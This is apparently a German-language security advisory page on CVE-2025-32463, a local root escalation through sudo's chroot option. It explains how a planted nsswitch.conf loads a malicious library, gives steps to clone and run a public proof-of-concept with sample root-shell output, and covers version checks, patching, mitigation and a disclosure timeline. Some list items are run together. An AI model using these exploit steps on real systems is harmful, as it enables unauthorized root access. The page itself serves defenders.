
CVE-2025-32463

Kritische lokale Privilegienausweitung im am weitesten verbreiteten Linux-Privilegienmanager
Jeder lokale Benutzer (auch ohne sudoers-Berechtigungen) könnte in Sekunden Root werden, indem er sudo -R verwendet
CVE-2025-32463 (auch bekannt als „chroot-to-root“) ist eine kritische lokale Privilegienausweitung in sudo.
Sie erlaubt jedem lokalen Benutzer ohne Privilegien – selbst solchen, die nicht in sudoers aufgeführt sind –, vollen Root-Zugriff zu erlangen, indem er einfach die Option -R / --chroot verwendet.
Der Fehler wurde in sudo 1.9.14 (Juni 2023) eingeführt und bestand bis 1.9.17p1 (Juni 2025). Es handelte sich nicht um einen traditionellen Bug, sondern um eine gefährliche Nebenwirkung der Art und Weise, wie sudo die Pfadauflösung innerhalb eines benutzerkontrollierten Chroots vor den Richtlinienprüfungen handhabte.
Offizielle Sudo-Sicherheitswarnung: „Ein Angreifer kann sudo’s
-R-Option ausnutzen, um beliebige Befehle als Root auszuführen, selbst wenn dieser nicht in der sudoers-Datei aufgeführt ist.“
Realitätscheck:
Der Bug entstand aus einer Änderung der sudo-Befehlsabgleichslogik von 2023:
-R /path verwendet wird, ruft sudo pivot_root() vor der vollständigen Auswertung der sudoers-Richtlinie auf./etc/nsswitch.conf aus dem Chroot heraus./etc/nsswitch.conf (z. B. passwd: /woot1337)libnss_/woot1337.so.2, die einen Konstruktor enthält, der als Root läuft.Wichtige Erkenntnis: Die Option -R war selbst für Benutzer ohne sudo-Berechtigungen erlaubt, was sie zu einem perfekten Angriffsvektor machte.
Nur sudo 1.9.14 bis 1.9.17 (vor 1.9.17p1)
Weit verbreitet betroffen:
NICHT betroffen:
Einzeiler-Exploit (von Stratascale CRU):
# 1 – clone repo
$ git clone https://github.com/zaryouhashraf/CVE-2025-32463
$ cd CVE-2025-32463
# 2 – build and run Docker image (tagged "sudo-chwoot")
$ sudo chmod +x CVE-2025-32463.sh
$ ./CVE-2025-32463.sh
# 3 – run exploit in container (runs root command directly or drops you into a root shell)
┌──(kali㉿kali)-[~]
└─$ ./CVE-2025-32463.sh
═══════════════════════════════════════════════════════════════
⚠ WARNING: CVE-2025-32463 EXPLOIT PoC ⚠
═══════════════════════════════════════════════════════════════
This script is for AUTHORIZED TESTING ONLY on systems you own.
Running on unauthorized systems is ILLEGAL.
Patch immediately after testing (sudo 1.9.17p1+).
[+] Creating temporary exploit stage...
[+] Compiling malicious NSS library...
[+] Triggering sudo -R ... (expect root shell)
(If successful, you'll drop into a root bash prompt)
[!] CVE-2025-32463 triggered - gaining root...
[+] You are now root!
┌──(root㉿kali)-[/]
└─# whoami
root
sudo -V | head -n 1
✅ Sicher, wenn 1.9.17p1 oder neuer (oder ≤ 1.9.13)
Debian/Ubuntu:
sudo apt update && sudo apt install --reinstall sudo
Fedora/RHEL:
sudo dnf update sudo
Arch:
sudo pacman -S sudo
Fügen Sie zu /etc/sudoers (oder einer Datei in /etc/sudoers.d/) hinzu:
Defaults !use_chroot
Suchen und entfernen Sie alle CHROOT=- oder runchroot=-Zeilen.
Profi-Tipp 2026: Scannen Sie alte Docker-Images, CI-Runner und Legacy-VMs – viele enthalten noch anfällige sudo-Snapshots.
--chroot) können zur Angriffsfläche werden, wenn sie nicht isoliert sind.Dieser Vorfall unterstrich die Notwendigkeit des Prinzips der geringsten Privilegien selbst in Kernsystemwerkzeugen.
Stand März 2026: ✅ Auf allen modernen Systemen vollständig behoben • Chroot-Funktion veraltet • Ökosystem sicherer
Mit ❤️ gemacht für Linux-Administratoren, die vor dem KEV-Eintrag gepatcht haben
| Datum | Ereignis |
|---|
| Juni 2023 | sudo 1.9.14 veröffentlicht (Bug eingeführt) |
| 1. April 2025 | Rich Mirch meldet privat |
| 8. April 2025 | CVE-2025-32463 zugewiesen |
| 9. Juni 2025 | Patch vorgeschlagen |
| 30. Juni 2025 | Öffentliche Offenlegung + Stratascale-Blog + vollständiger PoC |
| Juli 2025 | sudo 1.9.17p1 veröffentlicht; große Distributionen veröffentlichen Updates |
| 29. September 2025 | Aufnahme in den CISA-KEV-Katalog |
| 2026 | Chroot-Funktion wird im gesamten Ökosystem vollständig eingestellt |